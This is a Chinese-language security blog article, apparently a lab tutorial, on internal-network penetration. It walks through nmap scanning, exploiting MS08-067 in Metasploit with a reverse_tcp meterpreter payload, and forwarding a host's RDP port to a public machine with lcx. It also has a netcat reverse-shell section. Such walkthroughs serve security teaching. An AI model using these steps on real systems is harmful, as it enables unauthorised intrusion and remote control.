freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透漏洞利用实操报告
2019-01-18 09:22:52

0x01 内网信息收集实施攻击

在同一个网段中,扫描主机存活信息,能确定一定范围,寻找目标主机,并且可以获得主机开放的端口;运行的服务,挖掘到存在的漏洞信息。

图片.png首先用nmap获取到有漏洞的主机,然后打开metasploit;启动postgresql服务;切换数据库账户,创建数据库账户,设置密码后,账户为msf3@。

#servuce postgresql start(启动postgresql服务)

#su postgres(切换posstgres账户)

#createuser msf3 –P(创建msf3账户)

#createdb –owner=msf3 msf3(创建数据库名为msf3)

#db_connect msf3:msf3@localhost/msf3(连接msf3账户)

#db_status(查看已连接数据库账户状态)

图片.png#search ms08_067(搜索微软系统命名代号是MS08_067漏洞)

#use exploit/windows/smb/ms08_067_netapi(使用msf里面的漏洞利用模块)

#show options(显示漏洞显示选项)

#set payloadwindows/meterpreter/reverse_tcp(设置反向TCP模块)

#exploit(开始攻击)

图片.png图片.png图片.png

0x02 LCX内网转向公网


内网机器上执行:lcx.exe –slave 公网IP +端口 内网IP +端口

例如:lcx.exe slave 192.168.1.118 51 192.168.1.119 3389

将内网(192.168.1.119)的3389端口转发到公网(192.168.1.118)的51端口

图片.png然后在公网的机器上:

Lcx.exe –listen 监听51端口,转发到公网机器的3389端口

例如:Lcx.exe listen 51 3389

图片.png这个时候已经将内网的3389转发到了公网机器的3389端口,我们在本地机器上远程公网IP+3389 ,就连接上了内网机器的3389

图片.png

0x03 NC 反弹CMDshell


本机:192.168.1.118(win7)

远程机器:192.168.1.119(xp)

正向连接:

在远程机器上(t参数可以省略)

图片.png在本地机器上:

图片.png成功之后,本地机器就获得了一个远程机器的shell:

图片.png


# 内网渗透
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者